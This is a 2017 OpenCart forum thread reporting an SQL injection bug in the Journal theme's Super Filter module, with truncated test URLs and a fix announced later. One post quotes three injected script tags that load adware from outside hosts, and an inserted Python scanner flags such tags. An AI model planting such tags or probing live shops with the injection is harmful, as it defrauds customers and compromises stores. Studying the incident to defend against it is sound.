Post by Agit » Mon May 01, 2017 4:38 am

Hi, the Journal theme has an SQL injection bug.
I found it in the latest version; please close the Super Filter module.
Is the Journal Theme ownership here?

SQL Injection : https://www.journal-theme.com/4/index.p ... d=7'Inject Here

Software Developer | PHP | Python | Javascript | C# | Node JS | Integration



Post by rhysjuk » Mon May 01, 2017 5:31 am

I have also found the Journal theme to have a vulnerability to SQL injections.
Somehow the injection is able to inject JavaScript into the product description, forcing popup websites on customers viewing the description. I've managed to stop the injection but cannot provide information yet for security reasons; the loss of income my client has endured is huge. I believe the Journal devs should take responsibility to fix this bug.


Post by IP_CAM » Mon May 01, 2017 5:48 am

I believe the Journal devs should take responsibility to fix this bug

May be the case, but this is surely not an OpenCart problem, so it will, other than warning users,
not make much sense to publish this here. Journal has its own site to communicate with their
customers; after all, it's a paid theme, and they made a fortune on it.
Just to mention it! ;)
Ernie
Last edited by IP_CAM on Mon May 01, 2017 6:41 am, edited 1 time in total.

My Github OC Site: https://github.com/IP-CAM
5'200 + FREE OC Extensions, on the World's largest private Github OC Repository Archive Site.



Post by rhysjuk » Mon May 01, 2017 5:56 am

I don't believe this topic should remain solely with Journal, it should still be discussed here also. I don't see any negative reasons not to share this information with the community?


Post by IP_CAM » Mon May 01, 2017 6:21 am

Well, I wrote it, just to make it clear for those, unaware of, that OC and Journal are different Things! ;)

I just tried to do the same with one of my 1.5.6.5 Test Shops, and there was no
problem because of this SIMPLE manufacturer'Inject link HACK; it only displayed a
regular OC "cannot find" message page. Still, I am rerouting all such calls on a
daily schedule; there is not a single day without hacking attempts, many from sources
looking for Magento holes, and others just testing out a system. I am grateful for this, still
I am locking such IP ranges out for good... :laugh: , not planning to do international sales...
---
Just the official OC-2 Demo Site at least produced a 500 Internal Server Error
https://demo.opencart.com/index.php?rou ... r%27Inject
but it's an old V2 version, so I advise everybody reading this to just try it out on your own shop.
http:// yourshop. ext/ index.php?route=product/manufacturer%27Inject
---
Ernie


Post by Agit » Mon May 01, 2017 6:29 am

IP_CAM wrote:
Mon May 01, 2017 6:21 am
Well, I wrote it, just to make it clear for those, unaware of, that OC and Journal are different Things! ;)

I just tried to do the same with one of my 1.5.6.5 Test Shops, and there was no
problem because of this SIMPLE manufacturer'Inject link HACK; it only displayed a
regular OC "cannot find" message page. Still, I am rerouting all such calls on a
daily schedule; there is not a single day without hacking attempts, many from sources
looking for Magento holes, and others just testing out a system. I am grateful for this, still
I am locking such IP ranges out for good... :laugh: , not planning to do international sales...
---
Just the official OC-2 Demo Site at least produced a 500 Internal Server Error
https://demo.opencart.com/index.php?rou ... r%27Inject
but it's an old V2 version, so I advise everybody reading this to just try it out on your own shop.
http:// yourshop. ext/ index.php?route=product/manufacturer%27Inject
---
Ernie

You are testing the URL wrong; the Journal theme's latest version has the bug. A critical vulnerability. Everyone needs to be informed. E-commerce is a serious business.


Post by sims » Mon May 01, 2017 6:38 am

Does this code get put in the product and category descriptions?

If so, it's not just the Journal theme; I know of at least 2 cases (and they are not using Journal).

Code:

<script data-cfasync='false' type='text/javascript' src='//p79479.clksite.com/adServe/banners?tid=79479_127480_7&tagid=2'></script>
<script type="text/javascript" src="//go.pub2srv.com/apu.php?zoneid=683723"></script>
<script async="async" type="text/javascript" src="//go.mobisla.com/notice.php?p=683724&interactive=1&pushup=1"></script>

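One way to check a shop for the kind of injected tags shown in the post above, added here as an example and not written by anyone in this thread: it scans description rows for `<script>` tags that load from hosts outside an allowlist. The sample rows, the allowlist and the function names are constructed, and it assumes descriptions may be stored HTML-entity-encoded, so each one is decoded before parsing.

```python
import html
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts the shop legitimately loads scripts from (constructed allowlist).
ALLOWED_SCRIPT_HOSTS = {"shop.example"}


class ScriptCollector(HTMLParser):
    """Collects the src host of every <script> tag; inline scripts yield None."""

    def __init__(self):
        super().__init__()
        self.hosts = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            # urlparse also handles protocol-relative URLs such as //host/path
            self.hosts.append(urlparse(src).hostname if src else None)


def script_hosts(description):
    """Return the script hosts found in one stored description."""
    parser = ScriptCollector()
    # Decode entities first so &lt;script ...&gt; is seen as a tag (assumption:
    # the description column may hold entity-encoded HTML).
    parser.feed(html.unescape(description))
    parser.close()
    return parser.hosts


def find_injected(rows, allowed=ALLOWED_SCRIPT_HOSTS):
    """rows: iterable of (table, row_id, description); returns suspicious rows."""
    findings = []
    for table, row_id, description in rows:
        bad = [h or "<inline>" for h in script_hosts(description) if h not in allowed]
        if bad:
            findings.append((table, row_id, sorted(set(bad))))
    return findings


# Constructed sample rows standing in for product and category description tables.
SAMPLE_ROWS = [
    ("product_description", 40, "&lt;p&gt;Plain product text&lt;/p&gt;"),
    ("product_description", 41, "&lt;p&gt;Text&lt;/p&gt;&lt;script "
     "src=&quot;//ads.invalid/apu.php?zoneid=1&quot;&gt;&lt;/script&gt;"),
    ("category_description", 20, "<p>Text</p><script "
     "src='//shop.example/widget.js'></script><script>void 0</script>"),
]
```

Feed it the description columns from a database export; any row it returns holds a script tag that the allowlist does not cover and should be compared against a known-good backup.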

Post by rhysjuk » Mon May 01, 2017 6:51 am

Yes Sims, that's very similar, just different URLs. I found a way to stop that from being injected, but it causes a small error on the site. I fear publishing the fix would compromise my client's site. Wondering how I can provide this information to genuine OpenCart admins.


Post by sims » Mon May 01, 2017 8:00 am

Hi Rhys
Thanks for the reply, sounds like we need to compare notes! as I have a reasonable idea how to block this now

I sent you a PM


Post by rhysjuk » Mon May 01, 2017 8:28 am

sims wrote:
Mon May 01, 2017 8:00 am
Hi Rhys
Thanks for the reply, sounds like we need to compare notes! as I have a reasonable idea how to block this now

I sent you a PM
Hi Sims,
I've sent you a PM with my findings, It's stuck in my outbox so not sure if it's bugged - have you received it?
Thanks
Rhys


Post by sims » Mon May 01, 2017 8:47 am

Rhys

yep got it - thanks

I'll compose a reply later today


Post by IP_CAM » Mon May 01, 2017 8:54 am

Well, I did it by just clicking the link, as you showed it above, and it produces the same error on all Journal
test pages. The link may contain much more code, but in the case of Journal, one single character and a
word will bring the system and DB to a hold.
---
https://www.journal-theme.com/7/index.p ... 7%27Inject
https://www.journal-theme.com/6/index.p ... 7%27Inject
https://www.journal-theme.com/5/index.p ... 7%27Inject
https://www.journal-theme.com/4/index.p ... 7%27Inject
https://www.journal-theme.com/3/index.p ... 7%27Inject
https://www.journal-theme.com/2/index.p ... 7%27Inject
---
And if anyone finds that big bunch of code, shown above, anywhere in the software, something went very wrong,
but probably not because of OC, or a 'clean' well known paid Theme only. :-\

Still, as long as it does not produce anything on my server and software, except for a not found page, I have no
problem to solve, and that makes me sleep much better, at least! 8)
Ernie

PS. But actually, I am not surprised, considering the great amount of 'darkwhite' copies available on the Web.
There must be a purpose to just give away 'stuff'. One should also be aware of this; the chances of being 'hit'
are real, I would be able to prove it... >:D
Just to mention this very fact as well!
Good Luck
Ernie


Post by roberttimes » Wed May 03, 2017 7:02 pm

IP_CAM wrote:
Mon May 01, 2017 8:54 am

Well, I did it by just clicking the link, as you showed it above, and it produces the same error on all Journal
test pages. The link may contain much more code, but in the case of Journal, one single character and a
word will bring the system and DB to a hold.
---
https://www.journal-theme.com/7/index.p ... 7%27Inject
https://www.journal-theme.com/6/index.p ... 7%27Inject
https://www.journal-theme.com/5/index.p ... 7%27Inject
https://www.journal-theme.com/4/index.p ... 7%27Inject
https://www.journal-theme.com/3/index.p ... 7%27Inject
https://www.journal-theme.com/2/index.p ... 7%27Inject
---
And if anyone finds that big bunch of code, shown above, anywhere in the software, something went very wrong,
but probably not because of OC, or a 'clean' well known paid Theme only. :-\

Still, as long as it does not produce anything on my server and software, except for a not found page, I have no
problem to solve, and that makes me sleep much better, at least! 8)
Ernie

PS. But actually, I am not surprised, considering the great amount of 'darkwhite' copies available on the Web.
There must be a purpose to just give away 'stuff'. One should also be aware of this; the chances of being 'hit'
are real, I would be able to prove it... >:D
Just to mention this very fact as well!
Good Luck
Ernie


It seems this has been addressed by Digital Atelier already as those links don't throw any errors now. Everyone should update the theme to the latest version.


Post by Agit » Thu May 04, 2017 4:29 am

The Journal team fixed the bug:

v. 2.9.8 – May 3, 2017
Fixed an issue with Banners carousel mode
Fixed an issue with Super Filter manufacturer IDs - Bug fix
Other minor fixes and improvements.
